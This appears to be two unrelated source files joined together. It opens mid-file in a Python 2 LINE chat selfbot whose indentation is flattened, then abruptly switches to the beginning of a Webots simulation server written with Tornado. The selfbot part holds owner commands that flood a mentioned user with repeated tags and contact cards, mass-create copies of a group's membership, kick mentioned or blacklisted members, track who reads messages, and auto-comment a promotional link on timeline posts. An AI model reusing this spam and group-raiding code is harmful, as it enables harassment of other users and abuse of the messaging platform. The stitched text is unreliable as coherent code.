items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif 'instagram ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
kr1.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
kr1.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
kr1.sendText(msg.to, str(njer))
          #==========================[WIB]===========================
elif msg.text in ["aah","Aah"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u4a361586c55ac4ef218a0a9b78b2f1b3',"}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["..."]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "',"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "Ban @" in msg.text:
#if msg.from_ in admin:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
kr1.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif "Unban @" in msg.text:
#if msg.from_ in admin:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
kr1.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
kr1.sendText(msg.to,_nametarget + " Not In Blacklist")
#==========================[WIB]===========================
elif "Ban:" in msg.text:
#if msg.from_ in admin:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr1.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr1.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif "Unban:" in msg.text:
#if msg.from_ in admin:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = kr1.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
kr1.sendText(msg.to,_name + " Delete From Blacklist")
except:
kr1.sendText(msg.to,_name + " Not In Blacklist")
#==========================[WIB]===========================
elif msg.text in ["Clear"]:
#if msg.from_ in admin:
wait["blacklist"] = {}
kr1.sendText(msg.to,"Blacklist Telah Dibersihkan")
#==========================[WIB]===========================
elif msg.text in ["Ban:on"]:
#if msg.from_ in admin:
wait["wblacklist"] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Unban:on"]:
#if msg.from_ in admin:
wait["dblacklist"] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Banlist"]:
#if msg.from_ in admin:
if wait["blacklist"] == {}:
kr1.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr1.sendText(msg.to,"Daftar Banlist")
num=1
msgs="*Blacklist*"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, kr1.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"])
kr1.sendText(msg.to, msgs)
#==========================[WIB]===========================
elif msg.text in ["Conban","Contactban","Contact ban"]:
#if msg.from_ in admin:
if wait["blacklist"] == {}:
kr1.sendText(msg.to,"Tidak Ada Blacklist")
else:
kr1.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = kr1.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
kr1.sendMessage(M)
#==========================[]===========================
elif msg.text in ["Midban","Mid ban"]:
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
kr1.sendText(msg.to,cocoa)
#==========================[WIB]===========================
elif msg.text in ["scan blacklist","Scan blacklist"]:
#if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kr1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
kr1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Kr spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
else:
pass
#==========================[WIB]===========================
elif ("Cium " in msg.text):
if msg.from_ in owner:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[target])
#kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
elif ("Aah " in msg.text):
if msg.from_ in owner:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
kr1.sendMessage(msg)
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[target])
kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif msg.text in ["Glist"]: #Melihat List Group
if msg.from_ in owner:
gids = kr1.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = kr1.getGroup(i).name
h += "[•]%s Member\n" % (kr1.getGroup(i).name +"👉"+str(len(kr1.getGroup(i).members)))
kr1.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["Glist2"]:
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr1.getGroup(i).name,i)
kr1.sendText(msg.to,h)
#==========================[WIB]===========================
elif "Asupka " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Kr asupka ","")
if gid == "":
kr1.sendText(msg.to,"Invalid group id")
else:
try:
kr1.findAndAddContactsByMid(msg.from_)
kr1.inviteIntoGroup(gid,[msg.from_])
kr1.sendText(msg.to,"succes di invite boss, silahkan masuk...!!")
except:
kr1.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#==========================[WIB]===========================
elif "Megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("Kr megs ","")
ap = kr1.getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
#==========================[WIB]===========================
elif "!megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("#megs ","")
ap = kr1.getGroups([msg.to])
semua = findAndAddContactsByMid(Mi_d)
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
klis=[kr1]
team=random.choice(klis)
kr1.findAndAddContactsByMid(Mi_d)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
kr1.createGroup(gName, semua)
team.findAndAddContactsByMid(Mi_d)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
#==========================[WIB]===========================
elif "recover" in msg.text:
if msg.from_ in owner:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.createGroup("recover", mi_d)
kr1.sendText(msg.to,"Success recover")
#==========================[WIB]===========================
elif "Spin" in msg.text:
if msg.from_ in owner:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.createGroup("Nah kan", mi_d)
kr1.sendText(msg.to,"Success...!!!!")
#==========================[WIB]===========================
elif msg.text in ["Removechat"]:
if msg.from_ in owner:
kr1.removeAllMessages(op.param2)
kr1.removeAllMessages(op.param2)
kr1.sendText(msg.to,"Removed all chat Finish")
#==========================[WIB]===========================
elif msg.text in ["Muach"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c',"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
if op.type == 17:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
except:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
kr1.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
kr1.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in admin:
if op.param2 in Bots or admin:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
kr1.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait['autoAdd'] == True:
if (wait['message'] in [""," ","\n",None]):
pass
else:
kr1.sendText(op.param1,str(wait['message']))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.kickoutFromGroup(op.param1,[op.param2])
kr1.updateGroup(G)
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = kr1.getGroup(op.param1)
kr1.sendText(op.param1, "╔═════════════\nSelamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName + "\n╠═════════════\n" + "😊Semoga Betah Kak 😘 \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 17:
if wait["Wc2"] == True:
if op.param2 in Bots:
return
G = kr1.getGroup(op.param1)
h = kr1.getContact(op.param2)
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + h.pictureStatus)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
kr1.sendText(op.param1, "╔═════════════\nBaper Tuh Orang :v \nSemoga Bahagia ya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#------------------------------------------------------------------------------#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = kr1.getContact(op.param2).displayName
Np = kr1.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[0] + " ☜" + "\nNah jangan ngintip mulu 😁. . .\nGabung Chat yux 😉")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[1] + " ☜" + "\nJangan ngintip.. 😏. . .\nMasuk ayox... 😆😂😛")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
kr1.sendText(op.param1, "hallo.. " + "☞ " + Name + " ☜" + "\nJangan ngintip aja\nMasuk gabung chat ya...😋 😝")
kr1.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
pass
else:
pass
except:
pass
else:
pass
if op.type == 55:
try:
if ngintip['intip'][op.param1]==True:
if op.param1 in ngintip['target']:
Name = kr1.getContact(op.param2).displayName
if Name in ngintip['toong'][op.param1]:
pass
else:
ngintip['toong'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[0] + " ☜" + "\nNah jangan ngintip mulu 😁. . .\nGabung Chat yux 😉")
else:
kr1.sendText(op.param1, "Hallo.. " + "☞ " + nick[1] + " ☜" + "\nJangan ngintip.. 😏. . .\nMasuk ayox... 😆😂😛")
else:
kr1.sendText(op.param1, "hallo.. " + "☞ " + Name + " ☜" + "\nJangan ngintip aja\nMasuk gabung chat ya...😋 😝")
else:
pass
else:
pass
except:
pass
else:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
    """Continuously auto-like (and optionally auto-comment on) timeline posts.

    Runs forever; any exception increments a failure counter and the function
    calls sys.exit(0) once that counter reaches 50 (counter is never reset).
    NOTE(review): Python 2 syntax (print statement); relies on module globals
    `kr1` (LINE client) and `wait` (feature-flag dict).
    """
    count = 1
    while True:
        try:
            # fetch the most recent timeline activity page
            for posts in kr1.activity(1)["result"]["posts"]:
                if posts["postInfo"]["liked"] is False:
                    if wait['likeOn'] == True:
                        # 1001 presumably selects the plain "like" reaction — verify against API
                        kr1.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        print "Like"
                    if wait["commentOn"] == True:
                        if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
                            # author is on the comment blacklist: skip commenting
                            pass
                        else:
                            kr1.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
        except:
            # best-effort loop: swallow any error, but bail out after 50 failures
            count += 1
            if(count == 50):
                sys.exit(0)
            else:
                pass
# Run autolike() in a background daemon thread so it terminates with the main process.
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
    """Like and comment on the 20 most recent timeline posts not yet liked.

    NOTE(review): Python 2 syntax; re-fetches the activity list on every
    iteration and indexes it by position, sleeping 0.6s between posts.
    """
    for zx in range(0,20):
        hasil = kr1.activity(limit=20)
        if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
            try:
                kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
                print "Like"
            except:
                # ignore API errors for individual posts and keep going
                pass
        else:
            print "Already Liked Om"
        time.sleep(0.60)
def likeme():
    """Like and comment on the bot's own recent posts (authors whose mid is in `mid`).

    NOTE(review): Python 2 syntax; unlike likefriend(), uses likeType=1002 and
    has no sleep between iterations.
    """
    for zx in range(0,20):
        hasil = kr1.activity(limit=20)
        if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
            # only act on posts written by this account (writer mid matches `mid`)
            if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
                try:
                    kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
                    print "Like"
                except:
                    pass
            else:
                print "Status Sudah di Like Om"
# Main long-poll loop: fetch up to 5 pending operations from the LINE server
# and dispatch each one to the bot() handler defined above.
while True:
    try:
        Ops = kr1.fetchOps(kr1.Poll.rev, 5)
    except EOFError:
        raise Exception("It might be wrong revision\n" + str(kr1.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # advance the revision cursor so processed operations are not re-fetched
            kr1.Poll.rev = max(kr1.Poll.rev, Op.revision)
            bot(Op)
|
simulation_server.py
|
#!/usr/bin/env python3
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots simulation server."""
from async_process import AsyncProcess
from io import BytesIO
from pynvml import nvmlInit, nvmlShutdown, nvmlDeviceGetHandleByIndex, nvmlDeviceGetName, nvmlDeviceGetMemoryInfo, \
nvmlDeviceGetUtilizationRates, NVMLError
from requests import session
import asyncio
import errno
import json
import logging
import os
import psutil
import re
import shutil
import subprocess
import sys
import tempfile
import time
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import traceback
import socket
import zipfile
if sys.platform == 'win32':
import wmi
elif sys.platform == 'darwin':
import platform
else: # assuming linux
import distro
SNAPSHOT_REFRESH = 1 # make a performance measurement every second
network_sent = 0
network_received = 0
def expand_path(path):
    """Return *path* with '~' and environment variables expanded."""
    home_expanded = os.path.expanduser(path)
    return os.path.expandvars(home_expanded)
def mkdir_p(path):
    """Create directory *path* (including parents) if it doesn't exist.

    Mirrors ``mkdir -p``: an already-existing directory is not an error.
    Any other failure — including *path* existing as a non-directory —
    raises OSError, matching the original hand-rolled EEXIST check.
    """
    # exist_ok=True tolerates an existing directory but still raises
    # FileExistsError (an OSError with EEXIST) if path exists as a file.
    os.makedirs(path, exist_ok=True)
def chmod_python_and_executable_files(directory):
    """Recursively grant mode 0o775 to *.py files and extension-less entries.

    No-op on Windows, where POSIX permission bits don't apply.
    Extension-less directories are chmodded too, after their contents.
    """
    if sys.platform == 'win32':
        return
    for entry in os.listdir(directory):
        entry_path = os.path.join(directory, entry)
        if os.path.isdir(entry_path):
            # depth-first: fix permissions inside subdirectories first
            chmod_python_and_executable_files(entry_path)
        is_python = entry.endswith('.py')
        has_no_extension = os.path.splitext(entry)[1] == ''
        if is_python or has_no_extension:
            os.chmod(entry_path, 0o775)
class Snapshot:
    """This class stores instantaneous monitoring information on the machine."""

    # Column order of the monitor log file; also the key order of self.data.
    FIELDS = ('Timestamp', 'Webots running', 'Webots idle', 'CPU load',
              'CPU memory', 'GPU load compute', 'GPU load memory', 'GPU memory',
              'Swap', 'Disk', 'Network sent', 'Network received')

    def __init__(self):
        """Create an empty instance of MonitorSnapshot with all metrics at 0."""
        self.data = {field: 0 for field in Snapshot.FIELDS}

    def write(self):
        """Append this snapshot as one comma-separated line to the monitor log.

        Does nothing when monitoring is disabled in the configuration.
        Uses the module-level `monitorFile` path set at startup.
        """
        if not config['monitorLogEnabled']:
            return
        global monitorFile
        # context manager ensures the log handle is closed even if a write fails
        with open(monitorFile, 'a') as file:
            file.write(", ".join(str(self.data[field]) for field in Snapshot.FIELDS) + "\n")
class Client:
    """This class represents an instance of connected client.

    Owns the per-client Webots process, its streaming port and a private
    copy of the simulation project on disk.
    """
    def __init__(self, client_websocket=None):
        """Create an instance of client."""
        self.client_websocket = client_websocket  # tornado websocket back to the web client
        self.streaming_server_port = 0  # TCP port of this client's Webots streaming server
        self.webots_process = None  # subprocess.Popen handle, None when not running
        self.on_webots_quit = None  # callback invoked when Webots exits
        self.project_instance_path = ''  # private on-disk copy of the project
        self.app = ''
        self.world = ''
        self.idle = True  # True while the simulation is paused
    def __del__(self):
        """Destroy an instance of client."""
        if self.client_websocket:
            self.client_websocket.close()
        self.kill_webots()
        self.cleanup_webots_instance()
    def setup_project(self):
        """Prepare the per-client project directory, from GitHub or from a ZIP."""
        self.project_instance_path = config['instancesPath'] + str(id(self))
        # self.url only exists for 'start' (GitHub checkout) requests
        if hasattr(self, 'url'):
            return self.setup_project_from_github()
        else:
            return self.setup_project_from_zip()
    def setup_project_from_github(self):
        """Export a project folder from GitHub (via svn) into the instance path.

        Expects URLs of the form
        webots://github.com/<user>/<repo>/<tag|branch>/<name>/.../worlds/<file>.wbt
        Returns True on success, False (with a logged error) otherwise.
        """
        if not self.url.startswith('webots://github.com/'):
            logging.error('The URL argument should start with "webots://github.com/"')
            return False
        parts = self.url[20:].split('/')
        length = len(parts)
        if length < 6:
            logging.error('Wrong Webots URL')
            return False
        username = parts[0]
        repository = parts[1]
        tag_or_branch = parts[2]
        tag_or_branch_name = parts[3]
        folder = '/'.join(parts[4:length - 2])
        project = '' if length == 6 else '/' + parts[length - 3]
        if parts[length - 2] != 'worlds':
            logging.error('Missing worlds folder in Webots URL')
            return False
        filename = parts[length - 1]
        if filename[-4:] != '.wbt':
            logging.error('Wrong Webots URL: missing world file in ' + filename[-4:])
            return False
        self.world = filename
        # map the tag/branch to GitHub's svn bridge layout (trunk/tags/branches)
        url = 'https://github.com/' + username + '/' + repository + '/'
        if tag_or_branch == 'tag':
            url += 'tags/' + tag_or_branch_name
        elif tag_or_branch == 'branch':
            url += 'trunk' if tag_or_branch_name == 'master' else 'branches/' + tag_or_branch_name
        else:
            logging.error('Wrong tag/branch in Webots URL: ' + tag_or_branch)
            return False
        url += '/' + folder
        try:
            path = os.getcwd()
        except OSError:
            path = False
        mkdir_p(self.project_instance_path)
        os.chdir(self.project_instance_path)
        # stream svn output, coloring stderr red; 'x' marks end of output
        command = AsyncProcess(['svn', 'export', url])
        sys.stdout.write('$ svn export ' + url + '\n')
        sys.stdout.flush()
        while True:
            output = command.run()
            if output[0] == 'x':
                break
            if output[0] == '2': # stderr
                sys.stdout.write("\033[0;31m") # ANSI red color
            sys.stdout.write(output[1:])
            if output[0] == '2': # stderr
                sys.stdout.write("\033[0m") # reset ANSI code
            sys.stdout.flush()
        logging.info('Done')
        if tag_or_branch == 'branch' and tag_or_branch_name == 'master' and folder == '':
            os.rename('trunk', repository)
        if path:
            os.chdir(path)
        self.project_instance_path += project
        return True
    def setup_project_from_zip(self):
        """Setup a local Webots project to be run by the client."""
        shutil.copytree(os.path.join(config['projectsDir'], self.app) + '/', self.project_instance_path)
        hostFile = open(self.project_instance_path + "/host.txt", 'w')
        hostFile.write(self.host)
        hostFile.close()
        if self.user1Id:
            # authenticated user: fetch their customized project ZIP from the host
            payload = {'project': self.app, 'key': self.key,
                       'user1Id': self.user1Id, 'user1Name': self.user1Name, 'user1Authentication': self.user1Authentication,
                       'user2Id': self.user2Id, 'user2Name': self.user2Name, 'customData': self.customData}
            with session() as c:
                response = c.post(self.host + '/ajax/download-project.php', data=payload)
            if response.content.startswith(b'Error:'):
                error = response.content.decode('utf-8')
                if error.startswith('Error: no such directory: '):
                    return True # Use the default directory instead
                logging.error("Failed to download project: " + error + "(host = " + self.host + ")")
                return False
            fp = BytesIO(response.content)
            try:
                with zipfile.ZipFile(fp, 'r') as zfp:
                    zfp.extractall(self.project_instance_path)
            except zipfile.BadZipfile:
                logging.error("Bad ZIP file:\n" + response.content.decode('utf-8'))
                return False
        chmod_python_and_executable_files(self.project_instance_path)
        return True
    def cleanup_webots_instance(self):
        """Cleanup the local Webots project not used any more by the client."""
        if self.project_instance_path:
            shutil.rmtree(self.project_instance_path)
    def start_webots(self, on_webots_quit):
        """Start a Webots instance in a separate thread."""
        def runWebotsInThread(client):
            # Launch Webots, wait for its 'open' line, tell the web client the
            # streaming URL, then relay pause/run state until the process exits.
            global config
            world = self.project_instance_path + '/worlds/' + self.world
            port = client.streaming_server_port
            command = config['webots'] + ' --batch --mode=pause --minimize '
            command += '--stream="port=' + str(port) + ';monitorActivity'
            if not hasattr(self, 'url'):
                if self.user1Authentication or not self.user1Id: # we are running our own or an anonymous simulation
                    command += ';controllerEdit'
            if 'multimediaServer' in config:
                command += ';multimediaServer=' + config['multimediaServer']
            if 'multimediaStream' in config:
                command += ';multimediaStream=' + config['multimediaStream']
            if config['ssl']:
                command += ';ssl'
            command += '" ' + world
            try:
                client.webots_process = subprocess.Popen(command.split(),
                                                         stdout=subprocess.PIPE,
                                                         stderr=subprocess.STDOUT,
                                                         bufsize=1, universal_newlines=True)
            except Exception:
                logging.error('Unable to start Webots: ' + command)
                return
            logging.info('[%d] Webots [%d] started: "%s"' % (id(client), client.webots_process.pid, command))
            while 1:
                if client.webots_process is None:
                    # client connection closed or killed
                    return
                line = client.webots_process.stdout.readline().rstrip()
                if line.startswith('open'): # Webots world is loaded, ready to receive connections
                    break
            hostname = client.client_websocket.request.host.split(':')[0]
            protocol = 'wss:' if config['ssl'] or config['portRewrite'] else 'ws:'
            separator = '/' if config['portRewrite'] else ':'
            # this thread has no event loop yet; tornado needs one to write messages
            asyncio.set_event_loop(asyncio.new_event_loop())
            message = 'webots:' + protocol + '//' + hostname + separator + str(port) + '/'
            client.client_websocket.write_message(message)
